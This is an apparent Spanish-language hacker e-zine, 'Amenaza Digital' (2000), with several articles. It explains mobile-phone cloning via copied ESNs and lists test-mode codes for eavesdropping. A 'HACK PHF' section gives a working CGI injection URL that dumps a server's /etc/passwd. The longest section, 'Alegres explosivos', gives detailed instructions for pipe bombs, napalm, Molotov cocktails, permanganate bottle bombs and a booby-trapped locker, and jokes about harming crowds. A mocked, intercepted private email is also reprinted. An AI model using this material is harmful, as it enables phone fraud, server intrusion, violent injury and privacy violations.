memoria, y todo eso, para esto debimos haber leido algun manual del equipo, para esto ultimo podemos ir a un lugar de venta y en vez de pedirle un celular pedirle el manual porque si vemos que tiene determinadas funciones lo compraremos, sino no,la misma excusa para el caso de conseguir el celular.Bien accedemos a la funcion requerida para acceder al numero de fono, donde se puede encontrar algo como MEX A 981-79980, o como MEX B 982-14444, asi sabemos a que numero pertenece el E SN que averiguaremos, luego accedemos a la funcion para acceder al ESN, lo leemos y escribimos o memorizamos, y listo. Ahora ponemos en mano nuestro celular, le ingresamos los datos que averiguamos y a hacerlo funcionar. Si el numero lo averiguamos de un lugar de venta, posiblemente no este aun en funcionamiento, pero no temais, que nuestro vendedor se encargara de que el aparato entre pronto en funcionamiento al venderselo a alguna persona que necesite "estar comunicado siempre". Modo test en celulares Esto es otra forma que sirve para: -Escuchar transmisiones de celulares -Transmitir a otros celulares O sea, que tambien podemos hablar solo que es de cierta manera diferente. Las ventajas de este modo, son varias, alguna por ejemplo es el hecho de que no se necesita inversion extra de dinero, ya que se realiza solo con nuestro celular. Bueno hoy les vamos a explicar como se puede hacer esto en la mayoria de los telefonos nuevos. La mayoria de los nuevos telefonos tienen una bateria con tres pines, pero uno de los tres pines lo tienen bajo, o sea que no hace contacto con la bateria, lo que debemos hacer es lo que estaran pensando ahora, esto quiere decir hacer que este tercer contacto bajo entre en contacto con la bateria. Con esto basta, en el caso de que no haya ninguno bajo pues debemos probar, no pasa nada con probar con poner en contacto uno y otro, digo porque hay baterias que tienen varios contactos y por ahi no tenemos idea de cual puede ser, asi que en ese caso a probar. Ahora teniendo insertada la bateria en el aparato y en contacto con este pin,

presionamos la tecla PWR, y asi luego de algunos numeros, podemos utilizar el movil en este modo. Primero pulsamos la tecla "#" y luego comenzamos a ingresar los comandos del modo test que son los siguientes: COMANDO # 01# 02# 03# 04# / | | seteos default | | \ 06# 07# 08# 09# 10# 11XXX# FUNCION Tecla inicial para entrar en los comandos de modo test Resetea el celular Muestra el status actual Resetea el timer autonomo a cero minutos Inicializa la unidad con los sets default: Carrier off. Atenuador de RF al maximo poder. Receptor de audio anulado. < | Transmisor de audio anulado. | Tono de sealizacion apagado. Reseteo del WatchDog Timer. DTMF y tonos de audio apagados. Capsula Telefonica encendida.

Transmision de portadora apagada. Receptor apagado. (audio) Receptor encendido (audio) Transmision de audio apagada. Transmision de audio encendido. Selecciona un canal dado por xxx (XXX = designa el numero deciaml de canal, 3 digitos) 12x# Setea poder del equipo dado por x (0=max, 7=min) 13# Equipo apagado. 14# Activacion de un tono de 10 Khz. 15# Apagado del tono de 10 Khz. 19# Muestra la version del soft utilizado. 25x# SAT tone donde si x=0 el tono es de 5970 Hz. si x=1 el tono es de 6000 Hz. si x=2 el tono es de 6030 Hz. 26# SAT TONE apagado. 27# Transmite datos del celular. (CUIDADO!) 28# Activa un tono de 1150 Hz. 29# Desactiva el tono de 1150 Hz. 30# Activa un tono de 770 Hz. 31# Desactiva el tono de 770 Hz. 32# Borra todos los timers y reseteos que el usuario haya programado, inicializa la NAM 33x# Enciende tono de DTMF donde x puede ser 0-9,* y #. 34# Tono(s) de DTMF apagado(s). 36xxx# Activa el scanner de canales, xxx es la pausa entre cada canal, la tecla "#" aborta el scanneo 38# Muestra el ESN 45# Muestra el RSSI actual, poder de la seal actual para ese canal 46# Muestra el Timer de llamada aculmulativo. 47x# Setea nivel de receptor de audio de 0 a 7. 48# Side Tone On. 49# " " Off. 55# Modo programacion, muestra/cambia el contenido de la NAM 58# Compandor On 59# Compandor Off

61# dtm/minitac) 62# 63#

Transferencia del numero de serie (solo para Enciende alarma de llamada Desactiva alarma de llamada

Les recuerdo, que para transmitir deben pulsar 08# y no como dice DADE 05#. Bueno, eso es todo por hoy, asi que espero que les sirva, se diviertan un poco y bueno, hasta la proxima. CONTACTANDO CON MUERTOS Recopilado por Blairboy ([ERAD] / Elite RADikal) La vez pasada revisando un par de libros viejos, encontre un librito que contaba sobre los secretos de LAS BRUJAS y sus BRUJERIAS. Entre Estupideces y demas encontre algo Mas o Menos chido, y es el ritual para contactarse con los muertos! aca va: OH DIOS DE LOS CUERNOS, GRAN SEOR DE LA MUERTE, TE PIDO CON ALIENTO ENTRECORTADO, QUE ME ENVIES DESDE TUE ESFERAS SUPERIORES, UNA PALABRA DE AQUELLOS QUE CONOCEMOS Y AMAMOS, PARA QUE NOS UNAMOS UNA VEZ MAS, Y TODOS SONRIAMOS Y RIAMOS, POR UN BREVE INSTANTE. Sentado en la habitacion, puede recibir a veces mensajes de personas que conocimos y nos fueron muy cercanas. Tambien se puede utilizar el tablero ouija u otro metodo. Y si no llega a nada, no se preocupe, la necromancia no se puede contactar con los muertos cada vez que se intenta, pero los espiritus fallecidos se contactaran cada vez que tengan algo que decir. Como en la vispera de Todos los Santos es la fiesta de los muertos (halloween) es mas facil obtener resultados. Ahora vieja's no les queda otra que probar ... o no? HACK PHF Recopilado por LockChase ([ERAD] / Elite RADikal) Esta pinche tecnica ya es muy conocida y la verdad es que tendremos suerte si nos funciona pero todavia sigue vigente y doy fe de ello }:-) solo hay que saber buscar y tener paciencia. Para que esto nos funcione solo tenemos que tener un navegador instalado en nuesto win95, por defecto suele venir el IE o sea que no podras decir que no tienes, siempre y cuando hallas instalado los paquetes extras. Lo que tenemos que hacer es ir con nuestro navegador a algun servidor que corra sobre unix (muchos). Conectamos con un servidor en cuestion, www.victima.com, ya estamos viendo su web, llegados aqui, a esa linea le aadimos: http://www.victima.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd Como ya he dicho si todo sale bien nos aparecera el fichero de passwords del servidor con lo que solo nos queda grabarlo en nuestro HD. Por supuesto el PHF tiene muchas variantes por eso te aconsejo que busques algo que

profundice en esta tecnica al igual que tambien busques informacion sobre el fichero passwd de unix para comprenderlo. ALEGRES EXPLOSIVOS Por Stranger bueno .......hoy estoy inspirado a si que me dedico a escribir...y para que esten felices y cumplan con su mision como siempre unas formas de hacer tu propio proyecto:"terrorista" jejejejje ..... esta informacion es solo para educacion (ignorantes hijos de la gran puta!)... yo ni nadie de la ELite RADikal se hace/n responsable/s del uso o dao que esto llegara a causar (o te cause) asi como tampoco de lo pendejo que seas jejeje. Que quede bien clarito: "NO SE ACEPTAN RECLAMOS" jajajaja ... Empezamos.......(el indice que sigue es al solo fin de orientarlos....por el buen camino ...jejejej ..) 1) 2) 3) 4) 5) 6) 7) 8) 9) * 1) La bomba del tubo -------------------La Bomba del tubo es una herramienta comun del anarquista moderno. Es simplemente un tubo lleno de material explosivo y tapado por ambos extremos. se recomienda mucho cuidado ...(estoy sentimental :) ...) bah... *MUCHO* cuidado... Hay dos versiones de la bomba del tubo que parece estar favorecido por la mayoria de los anarquistas. La cabeza de fosforo y la polvora. Describire ambos. - Cabeza de fosforo Esta parece ser la version mas popular entre la juventud de hoy. Esto puede ser porque es menos peligroso y algunos disfrutan el uso de todos sus miembros. jejeje Se hace tomando simplemente un tubo con tapa a rosca en cada extremo y llenandolo con cabezas de fosforos. Preferiblemente aquellas que se encienden a golpearlas con cualquier cosa. Aunque cortar las cabezas de fosforos puede ser un trabajo largo.. no te quejes ..jejjeje hazlo con un amigo ..(tu empinado jajajajaj) .... Una vez que se ha llenado el tubo, cuidadosamente se lo cierra por ambos extremos. Mientras mayor sea su tubo, mas destructivo sera. Taladre un agujero en una tapa e inserte la mecha (sugiero algo que arda lento). Estas bombas son destructoras y RUIDOSAS. Si detonara en un area cerrada, puede ocasionar la perdida de audicion. Si detonara cerca de gente (muchedumbre ejejjeje) ...exacto DESTRUCTORAS Y La bomba del tubo Napalm Variaciones familiares de productos quimicos utiles El coctail Molotov La bomba de la pelota de tenis La bomba del disquet Bomba de humo del casillero de secundaria (u otro je!) La bomba de humo La bomba de la botella

RUIDOSAS !......... opcion 2: -- Polvora Basicamente el mismo concepto, excepto que el tubo esta lleno con polvora de balas o cohetes (se recomienda la de las balas) la verdad lo mejor es usar polvora negra (bien pura) la mejor ! jejeje en lugar de cabezas de fosforos. Este es mas destructor en general, pero increiblemente peligroso. Tenga EXTREMA cautela cuando enrosque las tapas al final. Frecuentemente granos pequeos de polvora seran atrapados en la rosca, y cuando usted enrosque ... ya se habra imaginado lo que ocurre. Explicacion para el que no tiene imaginacion o es un gran baboso... es sencillo las piedritas de la polvora se quedan en la rosca al atornillar no estoy jodiendo...se produce una chispa y BOOM...vas derecho a la tumba je! en serio ........conozco gente que por poco pierde la vista ...asi que ya saben ........NO ME HAGO RESPONSABLE !!!!!!!! Sugiero limpiar cuidadosamente con un trapo humedo antes de enroscar el tubo. ahora ven por que lo del cuidado ...? :) * 2) Napalm -------Muchos de ustedes han sabido del Napalm y habran pensado en alguna mezcla altamente explosiva de productos quimicos. Esto es completamente falso. Napalm es simplemente una parte de jabon y una parte de gasolina. El jabon tiene que ser una barra picada de jabon o pedacitos de jabon. Los detergentes no sirven. Como se hace ? Tome una olla de bao maria y llenelo con agua. Hierva el agua y vaya a un lugar abierto sin peligros de llamas. Aada la gasolina en la parte superior y aada jabon y remuevalo hasta que este espeso. ahora tiene una de las mejores bombas de fuego de todos los alrededores. Deberia ser un espeso gel como sustancia. Es altamente inflamable, asi que no recomiendo ponerlo cerca de una llama. * 3) Las versiones familiares de productos quimicos utiles -------------------------------------------------------Algunos de ustedes ha visto tipos de archivos acerca de la bomba de plutonio . Bien, esta guia deberia ayudarlo, dandole sustituciones familiares de estos productos quimicos necesitados. Es una lista bastante completa : Acido acetico Oxido de aluminio Vinagre Aluminio

Potasio de Aluminio Aluminum Sulfate Hidroxido de aluminio Carbon Carbonico Cloridrato de carbon Calcio de Oxido Calcio de Sulfato Acido Carbonico Oxido Ferrico Glucosa Graphito Acido Hydrocloridico Hydrogeno de Peroxido Acetato Silicato de Magnesio Nitrato De sodio o potacio Naphtalina Dioxido de sodio Bicarbonato de sodio Carbonato De sodio Cloruro de sodio Hidroxido de sodio Clorato de zinc * 4) El Cocktail Molotov ---------------------

Aluminio Aluminio Amoniaco Tiza - Gis Liquido de Lipieza Limaduras Yeso Agua de Seltz Cao Oxidado Almibar Mina de Lapiz Acido Muriatico Peroxido Azucar Talco Salitre Bolitas de Naftalina Arena Soda o bicarbonato Soda Sal Lejia Tinner

Uno de los explosivos mas usados fue diseado por el anarquista Molotov. Es generalmente una botella llena de gasolina con una mecha combustible en la boca de la botella. El cocktail original, y en mi opinion, la mejor, fue una mezcla de 1 parte de gasolina y 1 de aceite de motor. La gasolina es obviamente la que ocasiona el fuego, y el aceite motriz ayuda a adherir el fuego a cualquiera superficie. Hay, sin embargo, otras variaciones algunas son estas. Una mezcla de brea y gasolina. Otra bomba de fuego se ha creado con cera derretida derramada en una botella de gasolina. Esto es, como podes imaginar, bastante doloroso si cayera encima de alguien o de mucha gente ...jejejeje ... Se deben lanzar tan pronto como pueda, debido a que no querras estar sosteniendo uno de estos cuando explota. jejejejjeje * 5) La bomba de la pelota de tenis -------------------------------Otra simple. Esta es construida tomando primero una pelota de tenis simple, y taladrando un agujero en ella. Entonces se obtienen aquellos fosforos con que golpean en cualquier parte y

se cortan las cabezas, poniendolas en el agujero. Cuando la bola se completa se la lanza a algo y no hara una explosion GRANDE pero asustara a alguien ... Si se quisiera aumentar el tamao de su explosion y el fuego, mezcle gasolina con los fosforos. jjejeje .. Este es un lindo explosivo para ir empezando ... ;) ... * 6) La bomba del disquet ---------------------Un excelente metodo de obtener venganza en una computadora de algun ex-amigo es bombardear la disquetera para que vea que no solo le mandamos virus! jeje! Esta es una bomba simple para hacer, y muy segura. Primero, obtenga un cuchillo y corte la solapa del disco que esta sellado con goma de modo que se pueda sacar el disco floppy real. Toma despues una taza y pon un poco de Removedor para pulir en ella. Entonces toma los fosforos, cortale las cabezas y mezclalas con el Removedor. Mezclar hasta obtener una especie de fango. Toma la mezcla y frotalo sobre el disco floppy (el disco real con la informacion en el).<------el disco redondo ( cinta)!!! Asegurese que no se vea a traves de cualquiera de los agujeros. Re-sellar el disco. Ahora ponelo entre dos libros muy pesados toda la noche. Cuando te levantes por la maana tendr s una bomba de disco completamente funcional. El girar de las cabezas contra el fosforo provocar una chispa, alumbrara el polvo removedor, y daar con el tiempo el drive. * 7) La bomba de humo del casillero de secundaria ---------------------------------------------Este es realmente agradable. He aqui una lista de los materiales que se necesitaran para este proyecto. 1) 1 bomba de humo (explicacion posterior). 2) 1 Cohete Modelo Ignitor. Usted puede obtenerlo en la Tienda de su Hobby favorito ;) 3) 1 pila. 4) 1 Alambre. 5) 1 Interruptor inverso (cuando esta para adentro = off, para afuera = on) 6) Sujetadores tipo cocodrilo. Sujetadores = # B | o v Mecha t --> 0---\ | o \ \ /# | n \___\______________________/ `` v / / \ ````` ----||||| + ^ \# `` | | |||||||| | ^ | | |Pila | | |||||

| | | ||||||||

| Alambre

| Cohete Ignitor

^ | | Bomba de humo

espero se entienda ... Bien, comenzare la explicacion. Lo que se debe hacer es colocar el boton de modo que este contra la puerta cerrada. Cuando la puerta se abra, el boton se hundira, la corriente pasara y encendera el Cohete Ignitor, este calienta la mecha, y su bomba de humo estallara!!!. Voila!!!!! Si se odiara realmente al tipo, haga que el cohete encienda una bomba de estruendo en lugar de una bomba de humo. Nota: Sirve para cualquier especie de gabinete o casillero o algo que se les ocurra que pueda ir... * 8) La Bomba de Humo -----------------Esta seccion le dir como hacer una bomba de humo basica. Es lindo, simple e increiblemente segura. 4 partes de azucar se mezcla con 6 partes de nitrato de potasio (salitre) y se lo derrite bajo una llama removiendolo. Antes de que se endurezca poner algunas cabezas de fosforo como mecha. Una libra llenar un cuarto completo con humo blanco. ;) * 9) La Bomba de la Botella -----------------------Esta es una bomba facil para hacer, y una de las mas utilizadas y efectivas. Lo que se necesita: 1) Botella de vidrio 2) Gasolina 3) Potasio permangante Tome su botella y llenela con gotas de gasolina. Ahora se cubre por fuera de la botella y enrolle alrededor de esta de modo que el gas se evapore por los lados.. Ahora aada algunos gotas del potasio permangante (cuando digo algunos, significa tres o cuatro). Esta bomba puede detonar simplemente arrojandola contra un objeto solido (una pared, un auto, la cabeza de alguien ;), etc..).

------------------------------------ya esta ...espero que se entretegan y lo que realmente ..vale la pena ... piensen seriamente ..en un lindo proyecto para ....seguir saludando a estas sociedades paranoicas ....jejejejejjejje .......... CORREO??? AQUI??? por Neon Ghost Sensei ([ERAD] / [ULTRA] /[BIOS]) Date: 16 Dic 2000 04:05:31 -0000 From: "MANUEL AMABILIS LOPEZ" <amalo@******.***> To: erad@epimp.com CC: Subject: chequen esto es de risa Add To Address Book

-------------------------------------------------------------------------------nicolas que ondas por que te fusite asi sin avisarme y de esa manera que creo no nos mereciamos pero en fin te diere que estamos trsistes opor que no has regresado a la casa, te extraamps wey , solo dime por que me dejaste solo aqui si sabias que iba a ir contigo fuese donde fuese, la neta wey estoy mal desde que no se nada de ti, es mas te dire que te fuiste sin motivo grave, mucha gente pregunta por la ropa y los juguestes y no se que decirles , con lo del carro no paso nada por que no me han llamado ni han ido a la casa , imagino que no hay pedos, te necesito cabron hermano , te extrao tanto que ya me esta haciendo mal el no verte , hablame a la casa para saber donde estas si vas a venir a buscarme, el tel es 01 981 ** *** habalme para que no me quede con la angustia, creo que eso no se vale hermano, si sabias que te ibamos a poyar en todo , nicolas llevame contigo no me dejes aqui, donde estan los sueos que teniamos a caso solo me utilisaste? se que no por eso tengo fe en que me vendras a buscar. te extraa como a nadie en el universo. adrian pd. batman sin robin , no es batman y robin.Date: Mon, 6 Nov 2000 20:45:13 -0600 From: "drekt cosmic drekt" <drekt@***********> Add To Address Book To: zargot@********* Subject: que ondas wey ---------------------------------------------------------riete caon Er... Por lo visto tronaste un mail... eso es ilegal...jejeje Que te puedo decir... Se ve que es una cartita medio gay... Chaitooooo....

------------------------------------------------------------------cOnTaKtA cOn AmEnAzA dIgItAl: _____________ 1.- a_digital@epimp.com ....-''``'._ _________) 2.- ERAD@epimp.com ,_ '-.___) 3.- bruno74@epimp.com `'-._)_) ----'``"-,__(__) o copia esto en tu browser y checa nuestro BBS: http://members.yourbbs.com/?10721 BlowFish passfrase: ELITE4353463464_DFGDFRYUEREFS345787125767908ADEF ----------------------------------------------------------------------------* P * A * L * A * B * R * A * S * * F * I * N * A * L * E * S * ----------------------------------------------------------------------------Weno, pos esto fue la Amenaza Digital nomber nain... como ven seguimos con el dedo en el renglon, esperando llegar a algo concreto en la escena... no nos abandonen porfas, sigan visitando el BBS, mandandonos sus dudas, sugerencias y hasta mentadas de madre... Saludos a todos los que en este ao han hecho a la Amenaza Digital mas chica, fea, grande, buena, pesima, regular o como sea. Saludos tambien a nuestras influencias, nunca llegaremos a ser como ellos: Isaac Asimov, Erich Von Daniken, Carlos Monsivais, Roberto Iris Balan, Pepo, Quino, Trino (master!!!), Elena Poniatovska, Sir Arthur Conan Doyle, Fernando Bonsembiante, a todos los que se nos olvidaron y tambien a todos nuestros camaradas del IRC. Muchisimas gracias a todos, y les deseamos unas navidades llenas de excesos, perversion y abuso de todo y para todos. Ah! y el mejor de los aos nuevos. FELICIDADES!!! JO JO JO JO JO!!! ''' (O O) +------oOO--(_)------------+ |uNANsE hAcKErS cAMpECHAnos| +----------------oOO-------+ |__|__| || || ooO Ooo Amenaza Digital (C) - Producto orgullosamente Campechano Campeche, Campeche, Mexico.

You might also like